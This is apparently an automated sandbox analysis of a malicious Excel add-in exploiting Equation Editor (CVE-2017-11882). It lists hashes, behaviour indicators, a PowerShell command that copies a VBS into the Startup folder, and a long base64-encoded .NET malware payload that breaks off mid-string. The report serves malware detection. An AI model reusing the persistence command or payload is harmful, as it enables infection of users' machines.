085555bf9e9abd741fd446a3112a4798dc576de3bede8ef872e87e14c270ef34

General

Target

SHIPPING DOC.xlam
Size

712KB
MD5

15001e69702b5cbbe9d3fc6e43b12097
SHA1

8e493f2fd24285832fae22491cd07a8c3853f015
SHA256

085555bf9e9abd741fd446a3112a4798dc576de3bede8ef872e87e14c270ef34
SHA512

23403612d49f55938f89ca0f91299318d69be55c947e2c43a605992bf5821f6b207102687a05a0cf39588811380b16889be7af5087971622d14e13c605816e8d
SSDEEP

12288:zXnWDA93WCrvU8jbH1LA68SQEnrRxUWZpwdTeISGGryQOHPMvtaZ5LtFV69bWigw:bH93NUeRU6FZrRxUWodKISG6yQOvsYZO

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	2640	EQNEDT32.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2640	EQNEDT32.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2692	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2576	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2116	powershell.exe
1656	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeDebugPrivilege	1656	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2576	EXCEL.EXE
2576	EXCEL.EXE
2576	EXCEL.EXE

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2640 wrote to memory of 2856	2640	EQNEDT32.EXE	29
PID 2640 wrote to memory of 2856	2640	EQNEDT32.EXE	29
PID 2640 wrote to memory of 2856	2640	EQNEDT32.EXE	29
PID 2640 wrote to memory of 2856	2640	EQNEDT32.EXE	29
PID 2856 wrote to memory of 2900	2856	WScript.exe	31
PID 2856 wrote to memory of 2900	2856	WScript.exe	31
PID 2856 wrote to memory of 2900	2856	WScript.exe	31
PID 2856 wrote to memory of 2900	2856	WScript.exe	31
PID 2900 wrote to memory of 2692	2900	cmd.exe	33
PID 2900 wrote to memory of 2692	2900	cmd.exe	33
PID 2900 wrote to memory of 2692	2900	cmd.exe	33
PID 2900 wrote to memory of 2692	2900	cmd.exe	33
PID 2900 wrote to memory of 2116	2900	cmd.exe	34
PID 2900 wrote to memory of 2116	2900	cmd.exe	34
PID 2900 wrote to memory of 2116	2900	cmd.exe	34
PID 2900 wrote to memory of 2116	2900	cmd.exe	34
PID 2856 wrote to memory of 1656	2856	WScript.exe	35
PID 2856 wrote to memory of 1656	2856	WScript.exe	35
PID 2856 wrote to memory of 1656	2856	WScript.exe	35
PID 2856 wrote to memory of 1656	2856	WScript.exe	35

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\SHIPPING DOC.xlam"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2576

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2640
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\IOE.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2856
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\IOE.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ pWpK.vbs')
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2900
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 10
      4⤵
      Runs ping.exe
      PID:2692
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [System.IO.File]::Copy('C:\Windows\system32\IOE.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ pWpK.vbs')
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2116
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKmSsWQAAAAAAAAAAOAAAiELAVAAADgAAAAGAAAAAAAAQlcAAAAgAAAAYAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPBWAABPAAAAAGAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAASDcAAAAgAAAAOAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAYAAAAAQAAAA6AAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAAPgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAkVwAAAAAAAEgAAAACAAUAsC0AAIgoAAADAAAAAAAAADhWAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAEAAAoqHgIoAwAACiqmcwQAAAqAAQAABHMFAAAKgAIAAARzBgAACoADAAAEcwcAAAqABAAABCoufgEAAARvCAAACioufgIAAARvCQAACioufgMAAARvCgAACioufgQAAARvCwAACirWfgUAAAQUKBoAAAosAisGfgUAAAQqcgEAAHDQBQAAAigPAAAKbxsAAApzHAAACoAFAAAEK9oafgYAAAQqHgKABgAABCpWcwwAAAYoHQAACnQGAAACgAcAAAQqHgIoHgAACioafgcAAAQqGigNAAAGKh4CKBIAAAoqABswDgBtBQAAAQAAESAADAAAKB8AAAoWKwEWRQwAAAAFAAAA0wAAAOAAAACFAQAArwEAAMABAADlAQAADQIAACwCAABDAgAAiwIAAMYCAAA4BgUAAHMgAAAKJSghAAAKbyIAAAoCKCMAAApyIQAAcHItAABwbyQAAApyMQAAcHI/AABwbyQAAApyQwAAcHJPAABwbyQAAApyUwAAcHJfAABwbyQAAApyYwAAcHJ1AABwbyQAAApyeQAAcHKLAABwbyQAAApyjwAAcHKhAABwbyQAAApypQAAcHKxAABwbyQAAApytQAAcHLHAABwbyQAAApyywAAcHLdAABwbyQAAApy4QAAcHLzAABwbyQAAApvJQAACgoGbyYAAAoLFzj4/v//BygjAAAKCxg46/7//wNysQAAcBYoJwAACjrUAAAAHxooKAAACiVy9wAAcCgpAAAKEwQSBP4WFAAAAW8QAAAKcvsAAHAoKgAACgxyBQEAcCgrAAAKKAEAACstQHMtAAAKcy4AAAoTBREFF28vAAAKEQVyEQEAcG8wAAAKEQVyhQEAcAgoMQAACm8yAAAKJREFbzMAAApvNAAACiZ+NQAACnL3AQBwF282AAAKDRk4Rv7//wlvNwAACnJTAgBwKAIAACstDAlyUwIAcAhvOQAACglvOgAACho4HP7//wcoOwAACigVAAAGGzgL/v//OFMDAAAEcscAAHAWKCcAAAo6NwMAAB8aKCgAAAoTBhw45v3//xEGczwAAApyBQEAcG89AAAKKAMAACs6+QIAACgpAAAKEwQdOL79//8SBP4WFAAAAW8QAAAKcvsAAHAoMQAAChMHHjif/f//EQZy9wAAcBEHKD4AAAoTCB8JOIj9//9zLQAACnMuAAAKEwkRCRdvLwAAChEJchEBAHBvMAAAChEJcoUBAHARCCgxAAAKbzIAAAolEQlvMwAACm80AAAKJh8KOED9//8UEwpyXQIAcHJ5AgBwKD8AAAooDAAAChMK3g8lKEAAAAoTCyhBAAAK3gARCjk9AgAAFBMMHws4Bf3//xEKFHJ7AgBwF40FAAABJRZymQIAcKIUFBQoQgAACihDAAAKcqkCAHARCChEAAAKKCkAAAqMFAAAAShFAAAKEw0RDShGAAAKEw4RDihHAAAKOrkBAAARChRyxQIAcBeNBQAAASUWEQ6iJRMPFBQXjQcAAAElFhecJRMQKEIAAAoREBaRLB8RDxaaKAwAAArQHAAAASgPAAAKKEgAAAp0HAAAARMOKAwAAAoTDBYrARZFBgAAAAUAAAAlAAAAWwAAAKUAAADjAAAABgEAADglAQAAEQwUcuMCAHAXjQUAAAElFnL9AgBwohQUKEkAAAoXK74RDBRyGQMAcBeNBQAAASUWHyUoKAAACnIvAwBwclMDAHByXQMAcChKAAAKohQUKEkAAAoYK4gRDBRyewMAcBeNBQAAASUWco8DAHARDBRyGQMAcBaNBQAAARQUFChCAAAKKAwAAAoRCChLAAAKKEUAAAqiFBQoSQAAChk4Pv///xEMFHIqBABwF40FAAABJRYRDBRyGQMAcBaNBQAAARQUFChCAAAKKEMAAAooTAAACqIUFChJAAAKGjgA////EQwUckwEAHAXjQUAAAElFnJkBABwohQUKEkAAAobON3+//8RDBRyeAQAcBeNBQAAASUWFowJAAABohQUKEkAAAocOLn+//8RDBRykAQAcBaNBQAAARQUFBcoTQAACibeDyUoQAAAChMRKEEAAAreAN4SEQwsDREMKAwAAAooTgAACibcByg7AAAKKBUAAAYfDDjA+v//KwsHKDsAAAooFQAABt4PJShAAAAKExIoQQAACt4AKgAAAEFkAAAAAAAA0QIAABgAAADpAgAADwAAABYAAAEAAAAAUgMAAMcBAAAZBQAADwAAABYAAAECAAAAUgMAANgBAAAqBQAAEgAAAAAAAAAAAAAAAAAAAF0FAABdBQAADwAAABYAAAETMAIAyQAAAAAAAABymgQAcHKsBABwKAQAACuACAAABHKaBABwcsYEAHAoBQAAK4AJAAAEcpoEAHBy8gQAcCgGAAArgAoAAARymgQAcHIUBQBwKAcAACuACwAABHKaBABwckAFAHAoCAAAK4AMAAAEcpoEAHByYgUAcCgJAAArgA0AAARymgQAcHKABQBwKAoAACuADgAABHKaBABwcqYFAHAoCwAAK4APAAAEcsoFAHBy1gUAcCgMAAArgBAAAARymgQAcHIABgBwKA0AACuAEQAABCqODwAoEgAABg8BKBMAAAbQBQAAGygPAAAKKE8AAAooDgAAKyoAAAAbMAsAwgQAAAIAABFyHgYAcAoWKwEWRQgAAAAFAAAATwAAAGMAAABzAAAAhAAAAJAAAACeAAAArAAAADiFBAAAHo0cAAABJRZyegYAcKIlF3KWBgBwoiUYcsQGAHCiJRly2gYAcKIlGnLuBgBwoiUbcv4GAHCiJRxyFgcA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AQCSAAAAAQCSAAAAAQCSAAAAAgBoAAAAAQBrAQAAAgBEBQAAAwBnAgAAAQD8CQAAAQBrAQAAAQCSAAAAAgBoAAAAAQDnAAAAAgBRCgAAAwBEBQAABABnAgAAAQD8CQAAAQDnAAAAAgBRCgAAAQCSAAAAAgBoAAAAAQDnAAAAAgBRCgAAAwBEBQAABABnAgAAAQD8CQAAAQDnAAAAAgBRCgAAAQCSAAAAAgBoAAAAAQDnAAAAAgBRCgAAAwBEBQAABABnAgAAAQD8CQAAAQDnAAAAAgBRCgAAAQCSAAAAAgBoAAAAAQDnAAAAAgBRCgAAAwBEBQAABABnAgAAAQD8CQAAAQDnAAAAAgBRCgAAAQCSAAAAAgBoAAAAAQBrAQAAAgCDCQAAAwAvBQAABAALAgAABQDMCQAABgBEBQAABwBnAgAAAQD8CQAAAQBrAQAAAgCDCQAAAwAvBQAABAALAgAABQDMCQAAAQCSAAAAAgBoAAAAAQBgCQAAAgB3CQAAAwAHBwAABACCBAAABQDgBQAABgBEBQAABwBnAgAAAQDgBQAAAgD8CQAAAQBgCQAAAgB3CQAAAwAHBwAABACCBAAABQDgBQAAAQCSAAAAAgBoAAAAAQBgCQAAAgB3CQAAAwAHBwAABACCBAAABQDdAAAABgBEBQAABwBnAgAAAQAHBwAAAgDdAAAAAwD8CQAAAQBgCQAAAgB3CQAAAwAHBwAABACCBAAABQDdAAAAAQCSAAAAAgBoAAAAAQBgCQAAAgB3CQAAAwBEBQAABABnAgAAAQD8CQAAAQBgCQAAAgB3CQAAAQCSAAAAAgBoAAAAAQCnAQAAAgDNAQAAAwDoCAAABADXCAAABQCxCAAABgADCQAABwAmCgAACACRCgAACQCaBgAACgARBgAACwBEBQAADABnAgAAAQCaBgAAAgARBgAAAwD8CQAAAQCnAQAAAgDNAQAAAwDoCAAABADXCAAABQCxCAAABgADCQAABwAmCgAACACRCgAACQCaBgAACgARBgkAsQcBABkAsQcFABEAsQcBAAwAsQcBABQAsQcBABwAsQcBACQAsQcBAAwAkgAnABQAkgAnABwAkgAnACQAkgAnAEEAYQQsACkAIgkxACkAGgE2AFEAWQE6ACkABAVBAGEACwFIACkAsQcBADwAkgBcADQATQQnAGkATQQnADQAVwRnAGkAVwRnADQAsQcBAGkAsQcBACkAGQltAFEAdgpzAHEAsQd4AJEA7gB/AIkAsQcBALkAtQWGAMkAsQcBANEAVACMAMkArwSRANkASgKXAOEAAwGcAOEABAVBAMkA5wSiAOkA9gSnAPEAIQWuAKEA+wC0AOEAoAm5AAEBwAjBAAkBgwrIABkBsQcBAKkAsQcBAKkAdwHUAKkAmgHbAOEAoAngAKkAiwnbABkBpgbmABkBMgrsACkBMgfwAJkAXwr0AJkAyQj7AAkBKQkDAZkAcAQZAZkARAIBADEB1gQfATkBsQfbADkBwAglAeEAoAkyAUkBrgk5AVEBlwc/AVEBhQdFAVkB1AlJAWEBBAVaAWkB7QWXAOEApwlfAWkB2QHgAHEBmQlmAWEB4QFrAVkB5wlyAWkB2QG5AGkBFQWXAGkBtwGXAFkBnQWEAXkBuwmWAXkBUQebAWEBPgekAYkBsQcBAIkBQAqrAUEBsQfbAJEBDQUBAHkBjQSwATEBOwC2AeEAqwq7AaEB0wa+AbEAsQcBAKkBRADBAaEBeQTIAakBTADMAcEBhwrTAakB+gjgATEBRADpARkBzgDuARkBsAUBAPEBsQcBAPkBsQf4AQECsQcBAAkCsQfbABECsQfbABkCsQfbACECsQfbACkCsQfbADECsQfbADkCsQf9AUECsQfbAEkCsQfbAFECsQfbAFkCsQcBAGECsQcBAGkCsQcCAnECsQcBAA4AgACuAi4AGwNkBC4AIwNtBC4AKwOMBC4AMwOMBC4AOwOMBC4AQwOMBC4ASwOMBC4AUwOMBC4AWwOMBC4AYwOSBC4AawO8BC4AcwPJBC4AOgITBUAAEwAYBUMAEwAYBWMAEwAYBYMAewMTBYMAgwMTBaMAewMTBaMAgwMTBcMAEwAhBeMAewMTBeMAgwMTBSMBewMTBUMBEwAYBUMBiwMqBWMBEwAYBWMBWwOMBMACEwAYBeACEwAYBQADEwAYBQMDkwOMBSADEwAYBYADEwAYBcADEwAYBQsAwgIPAMICNgC/AgEAAAAAABYAAQAAAAAAFwAKAmoCjQKSAiIACwASABkAIABFAE4AVQBkAAABEQEtAYEB5gH1AUABJQBdAAEAQwEnAGgJAQAEgAAAAQAAAAAAAAAAAAAAAADsBgAACgAAAAAAAAAAAAAAnAK4AAAAAAAEAAAAAAAAAAAAAAClAsoFAAAAAAQAAAAAAAAAAAAAAKUClAAAAAAABAAAAAAAAAAAAAAApQIQAgAAAAAAAAAAAQAAAJcIAAAKAAQACwAEAAwACQANAAkADgAJAA8ACQAQAAkAEQAJABIACQATAAkAFAAJABUACQAWAAkAFwAJAAAAEAAWAJIAAAAAACkAkgAAABAANQCSAAAAAAA3AJIAWQApAnEAKQJZAC0CKAAzAigAOAIoAD0CKABCAigARwIoAEwCKABRAigAVgIoAFsCKABgAqEAZQIjAGUCIwCXAgAAAAAAQWAxAElFbnVtZXJhYmxlYDEAQ29udGV4dFZhbHVlYDEAa2VybmVsMzIATWljcm9zb2Z0LldpbjMyAFRvVUludDMyAFRvSW50MzIAVG9JbnQxNgBnZXRfVVRGOABMb2FkTGlicmFyeUEAQgBDAEQARQBGAFZBSQBTeXN0ZW0uSU8AUUJYdFgAUHJvamVjdERhdGEAbXNjb3JsaWIAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMATWljcm9zb2Z0LlZpc3VhbEJhc2ljAEdldFByb2Nlc3NCeUlkAGJ5dGVzUmVhZAB0aHJlYWQAU3luY2hyb25pemVkAE5ld0d1aWQAUmVwbGFjZQBDcmVhdGVJbnN0YW5jZQBHZXRIYXNoQ29kZQBFbmRJbnZva2UAQmVnaW5JbnZva2UARW51bWVyYWJsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBoYW5kbGUARmlsZQBzZXRfV2luZG93U3R5bGUAUHJvY2Vzc1dpbmRvd1N0eWxlAHNldF9GaWxlTmFtZQBhcHBsaWNhdGlvbk5hbWUAR2V0RGlyZWN0b3J5TmFtZQBIb21lAGNvbW1hbmRMaW5lAENvbWJpbmUAQ2hhbmdlVHlwZQBWYWx1ZVR5cGUAU2VjdXJpdHlQcm90b2NvbFR5cGUAdHlwZQBTeXN0ZW0uQ29yZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAQ2xvc2UAU3RyUmV2ZXJzZQBNdWx0aWNhc3REZWxlZ2F0ZQBEZWxlZ2F0ZUFzeW5jU3RhdGUARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE9iZnVzY2F0aW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAWWFub0F0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBnZXRfVmFsdWUAc2V0X1ZhbHVlAEdldE9iamVjdFZhbHVlAFNldFZhbHVlAGdldF9TaXplAGJ1ZmZlclNpemUAU2l6ZU9mAHN0YXJ0dXBfcmVnAE5ld0xhdGVCaW5kaW5nAHNldF9FbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEZyb21CYXNlNjRTdHJpbmcARG93bmxvYWRTdHJpbmcAQ29tcGFyZVN0cmluZwBUb1N0cmluZwBSZWZyZXNoAEdldEZ1bGxQYXRoAEdldEZvbGRlclBhdGgAbGVuZ3RoAEFzeW5jQ2FsbGJhY2sARGVsZWdhdGVDYWxsYmFjawBNYXJzaGFsAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABMYXRlQ2FsbABGaWJlci5kbGwAS2lsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AUmFuZG9tAEJvb2xlYW4AYnl0ZXNXcml0dGVuAEdldEZpbGVOYW1lV2l0aG91dEV4dGVuc2lvbgBWZXJzaW9uAHByb2Nlc3NJbmZvcm1hdGlvbgBTeXN0ZW0uQ29u